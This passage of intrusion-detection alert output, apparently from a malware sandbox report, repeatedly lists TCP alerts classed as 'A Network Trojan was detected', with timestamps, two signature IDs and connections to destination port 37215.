              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111927
              SID:2835222
              Source Port:38008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970839
              SID:2829579
              Source Port:36988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486439
              SID:2829579
              Source Port:35792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432220
              SID:2835222
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520207
              SID:2835222
              Source Port:52688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079818
              SID:2835222
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099687
              SID:2829579
              Source Port:53066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538099
              SID:2829579
              Source Port:38674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591870
              SID:2835222
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456836
              SID:2835222
              Source Port:37544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878900
              SID:2835222
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099724
              SID:2835222
              Source Port:60442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700509
              SID:2835222
              Source Port:57682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154866
              SID:2835222
              Source Port:42686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.527086
              SID:2829579
              Source Port:45404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474172
              SID:2835222
              Source Port:49452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447185
              SID:2829579
              Source Port:43276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576437
              SID:2835222
              Source Port:60468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664539
              SID:2835222
              Source Port:47866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516546
              SID:2835222
              Source Port:46946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204801
              SID:2835222
              Source Port:38586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452790
              SID:2835222
              Source Port:34838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860007
              SID:2835222
              Source Port:50880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152711
              SID:2829579
              Source Port:51844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599197
              SID:2835222
              Source Port:39698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196955
              SID:2829579
              Source Port:37350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517465
              SID:2835222
              Source Port:44922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040411
              SID:2835222
              Source Port:58766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480517
              SID:2835222
              Source Port:56518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157585
              SID:2835222
              Source Port:55688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078731
              SID:2829579
              Source Port:33340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980872
              SID:2835222
              Source Port:42376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544194
              SID:2829579
              Source Port:52646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113689
              SID:2835222
              Source Port:34636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282238
              SID:2835222
              Source Port:55928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576474
              SID:2835222
              Source Port:54984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553312
              SID:2835222
              Source Port:55438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988764
              SID:2829579
              Source Port:53552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878306
              SID:2835222
              Source Port:44758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625586
              SID:2835222
              Source Port:44154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976948
              SID:2835222
              Source Port:58026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481997
              SID:2835222
              Source Port:51682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234461
              SID:2829579
              Source Port:58200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976910
              SID:2829579
              Source Port:51178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196958
              SID:2829579
              Source Port:58644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394945
              SID:2829579
              Source Port:58830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044498
              SID:2835222
              Source Port:35976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460577
              SID:2829579
              Source Port:57862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055581
              SID:2835222
              Source Port:60592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313598
              SID:2835222
              Source Port:47364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282985
              SID:2835222
              Source Port:33766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551825
              SID:2835222
              Source Port:44622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246585
              SID:2829579
              Source Port:56196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100849
              SID:2835222
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797815
              SID:2829579
              Source Port:57464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727249
              SID:2829579
              Source Port:54068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482800
              SID:2835222
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066318
              SID:2835222
              Source Port:52102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602828
              SID:2835222
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361016
              SID:2835222
              Source Port:50826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519619
              SID:2835222
              Source Port:52502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103671
              SID:2829579
              Source Port:38276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504775
              SID:2829579
              Source Port:39090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053917
              SID:2829579
              Source Port:51522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536808
              SID:2829579
              Source Port:33026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059761
              SID:2829579
              Source Port:45416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544213
              SID:2829579
              Source Port:58260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487576
              SID:2835222
              Source Port:46930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921111
              SID:2829579
              Source Port:50344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519495
              SID:2835222
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749825
              SID:2829579
              Source Port:53860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117169
              SID:2835222
              Source Port:36272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193945
              SID:2835222
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987387
              SID:2829579
              Source Port:42860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270696
              SID:2829579
              Source Port:49442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332146
              SID:2829579
              Source Port:45126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885275
              SID:2835222
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242047
              SID:2835222
              Source Port:46702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233877
              SID:2835222
              Source Port:48846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067950
              SID:2829579
              Source Port:50506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116682
              SID:2835222
              Source Port:42062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487466
              SID:2835222
              Source Port:60726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378081
              SID:2829579
              Source Port:36724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396164
              SID:2835222
              Source Port:46586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575802
              SID:2829579
              Source Port:58630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280981
              SID:2829579
              Source Port:50332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122930
              SID:2829579
              Source Port:36686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755559
              SID:2835222
              Source Port:59282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516488
              SID:2835222
              Source Port:41318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726095
              SID:2829579
              Source Port:48300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638236
              SID:2829579
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233761
              SID:2829579
              Source Port:44644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112651
              SID:2835222
              Source Port:39960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661989
              SID:2835222
              Source Port:50336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923645
              SID:2829579
              Source Port:53306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118514
              SID:2835222
              Source Port:59314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372001
              SID:2835222
              Source Port:52962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118379
              SID:2835222
              Source Port:49818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252558
              SID:2835222
              Source Port:39884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372070
              SID:2835222
              Source Port:39524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596625
              SID:2835222
              Source Port:51166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103376
              SID:2835222
              Source Port:54298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153894
              SID:2835222
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663630
              SID:2835222
              Source Port:50012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797570
              SID:2829579
              Source Port:56224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155573
              SID:2835222
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233897
              SID:2835222
              Source Port:45758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982398
              SID:2829579
              Source Port:53876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875714
              SID:2829579
              Source Port:47618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099519
              SID:2835222
              Source Port:49576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628034
              SID:2829579
              Source Port:45016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198594
              SID:2835222
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495282
              SID:2829579
              Source Port:57964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060768
              SID:2829579
              Source Port:60682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368410
              SID:2829579
              Source Port:43210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209673
              SID:2835222
              Source Port:47774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157717
              SID:2835222
              Source Port:54540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485921
              SID:2829579
              Source Port:46960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252715
              SID:2829579
              Source Port:33504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195268
              SID:2829579
              Source Port:48356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165240
              SID:2835222
              Source Port:34348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988556
              SID:2829579
              Source Port:50994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245580
              SID:2829579
              Source Port:57640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078228
              SID:2829579
              Source Port:34172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592076
              SID:2829579
              Source Port:39542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572449
              SID:2829579
              Source Port:60736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636793
              SID:2835222
              Source Port:34412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241991
              SID:2835222
              Source Port:52730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702793
              SID:2829579
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598204
              SID:2835222
              Source Port:53504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606180
              SID:2835222
              Source Port:60960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360704
              SID:2829579
              Source Port:57124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284066
              SID:2835222
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397179
              SID:2829579
              Source Port:52476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233450
              SID:2829579
              Source Port:50672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858426
              SID:2835222
              Source Port:60638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210064
              SID:2835222
              Source Port:48906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149016
              SID:2829579
              Source Port:51154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103021
              SID:2829579
              Source Port:38170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203036
              SID:2835222
              Source Port:59874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394547
              SID:2835222
              Source Port:38284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633656
              SID:2829579
              Source Port:36946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583961
              SID:2835222
              Source Port:55444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502056
              SID:2835222
              Source Port:54660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200751
              SID:2829579
              Source Port:42324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.829539
              SID:2835222
              Source Port:57214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129788
              SID:2829579
              Source Port:42754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546099
              SID:2835222
              Source Port:53260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575603
              SID:2835222
              Source Port:60390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208872
              SID:2835222
              Source Port:43730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639798
              SID:2829579
              Source Port:54600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265899
              SID:2835222
              Source Port:52944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368833
              SID:2835222
              Source Port:33652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431642
              SID:2829579
              Source Port:56968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478443
              SID:2829579
              Source Port:51550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397393
              SID:2829579
              Source Port:51598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623106
              SID:2829579
              Source Port:59322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187095
              SID:2829579
              Source Port:44172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535913
              SID:2829579
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634049
              SID:2835222
              Source Port:36480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202941
              SID:2829579
              Source Port:36196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575193
              SID:2829579
              Source Port:46872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483096
              SID:2829579
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372405
              SID:2829579
              Source Port:53798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433427
              SID:2835222
              Source Port:39146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355065
              SID:2835222
              Source Port:36940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517266
              SID:2829579
              Source Port:52946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700581
              SID:2829579
              Source Port:39576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574770
              SID:2829579
              Source Port:54078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097243
              SID:2835222
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797839
              SID:2835222
              Source Port:40806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280066
              SID:2829579
              Source Port:46110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574501
              SID:2829579
              Source Port:40150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289288
              SID:2829579
              Source Port:49632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917991
              SID:2835222
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480882
              SID:2835222
              Source Port:36366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640651
              SID:2829579
              Source Port:41684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575743
              SID:2829579
              Source Port:40858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055712
              SID:2829579
              Source Port:33176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108691
              SID:2835222
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601284
              SID:2829579
              Source Port:32806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540602
              SID:2829579
              Source Port:36744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070985
              SID:2835222
              Source Port:45760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868528
              SID:2829579
              Source Port:53888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340650
              SID:2829579
              Source Port:49772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098083
              SID:2835222
              Source Port:59242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280862
              SID:2829579
              Source Port:44372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573186
              SID:2829579
              Source Port:46966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290162
              SID:2835222
              Source Port:39114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396437
              SID:2835222
              Source Port:41342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802966
              SID:2829579
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671793
              SID:2829579
              Source Port:55512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411571
              SID:2835222
              Source Port:51450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349870
              SID:2835222
              Source Port:57604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189004
              SID:2835222
              Source Port:60580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329538
              SID:2835222
              Source Port:35128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107990
              SID:2835222
              Source Port:38206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
